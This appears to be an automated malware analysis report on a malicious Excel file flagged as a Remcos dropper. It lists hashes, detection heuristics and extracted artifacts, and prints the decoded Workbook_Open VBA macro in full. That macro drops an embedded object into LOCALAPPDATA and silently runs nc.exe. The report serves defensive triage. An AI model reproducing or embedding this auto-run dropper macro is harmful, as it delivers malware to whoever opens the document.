Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 13da495af25bee6d…

MALICIOUS

Office (OOXML)

587.7 KB Created: 2020-08-17 02:52:43 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2020-09-07
MD5: dc4a1f69c864bb02d5199c734629e8c1 SHA-1: c8ea034b85070972b51ba178df58810cc34dfb45 SHA-256: 13da495af25bee6db8ebc38f9e54aad8e1e812e9e133ad8b42dd8ddaa2394f29
378 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1137.001 Office Application Startup: VBA T1105 Ingress Tool Transfer

The sample is an Excel document containing a Workbook_Open VBA macro that utilizes WScript.Shell to execute a second-stage payload. The macro attempts to copy an embedded OLE object and then execute a file named 'nc.exe' from the user's local app data directory. This behavior is consistent with a dropper malware designed to download and execute further malicious components.

Heuristics 10

  • ClamAV: Win.Dropper.Remcos-10036273-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Dropper.Remcos-10036273-0
  • Ole10Native package drops an auto-executable payload critical OFFICE_PACKAGE_RISKY_FILE
    OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Dim wac56f55757dce55a5b0d78e97935d3a5
Set wac56f55757dce55a5b0d78e97935d3a5 = CreateObject("WScript.Shell")
ActiveSheet.OLEObjects(1).Visible = b2996a70fa7414259115a178c0c7815aa
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Dim wac56f55757dce55a5b0d78e97935d3a5
Set wac56f55757dce55a5b0d78e97935d3a5 = CreateObject("WScript.Shell")
ActiveSheet.OLEObjects(1).Visible = b2996a70fa7414259115a178c0c7815aa
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Attribute VB_Customizable = True
Private Sub Workbook_Open()
Dim wac56f55757dce55a5b0d78e97935d3a5
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    ActiveSheet.OLEObjects(1).Copy
CreateObject("Shell.Application").Namespace(Environ("LOCALAPPDATA")).Self.InvokeVerb "Paste"
wac56f55757dce55a5b0d78e97935d3a5.Run Chr(34) & Environ("LOCALAPPDATA") & "\nc.exe" & Chr(34), 0
  • Embedded OLE object medium OOXML_OLE_OBJECT
    Document contains an embedded OLE object
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 5

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1051 bytes
SHA-256: ea5b3163b8e41bde3e98bcb3e0092a3674eb24c34383333f63b036872fa37240
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Dim wac56f55757dce55a5b0d78e97935d3a5
Set wac56f55757dce55a5b0d78e97935d3a5 = CreateObject("WScript.Shell")
ActiveSheet.OLEObjects(1).Visible = b2996a70fa7414259115a178c0c7815aa
ActiveSheet.OLEObjects(1).Copy
CreateObject("Shell.Application").Namespace(Environ("LOCALAPPDATA")).Self.InvokeVerb "Paste"
wac56f55757dce55a5b0d78e97935d3a5.Run Chr(34) & Environ("LOCALAPPDATA") & "\nc.exe" & Chr(34), 0
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
ooxml_oleobject_00.bin ooxml-ole-object OOXML embedded OLE part: xl/embeddings/oleObject1.bin 640512 bytes
SHA-256: fb26b54a18cf135ce343e8fa1d6e45e0e5b44ff814877a710719d51157e022a8
Detection
ClamAV: Win.Dropper.Remcos-10036273-0
Obfuscation or payload: likely
Carved artifact entropy is 7.85, consistent with packed or encrypted content.
ooxml_oleobject_00_ole10native_00.bin ole-package OOXML xl/embeddings/oleObject1.bin Ole10Native stream: Ole10Native 633174 bytes
SHA-256: f083b2ebe5ee4241d645d43bb35cb4adfb50cd650be6df2e14dbb5d4c90b92c6
Detection
ClamAV: Win.Dropper.Remcos-10036273-0
Obfuscation or payload: likely
Carved artifact entropy is 7.87, consistent with packed or encrypted content.
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 9216 bytes
SHA-256: c86bfc2fdd222d43f889971f6bd7cdd7ccc1a7dabb5c2190f9dd570931be95cb
emf_00.emf ooxml-emf OOXML EMF part: xl/media/image2.emf 4968 bytes
SHA-256: 1a9ea287f049d5e03f397b4bb246ec981d21cbc1c8d8f0842952bae1eaab63e2

Open this report in the interactive analyzer, or submit your own file for analysis.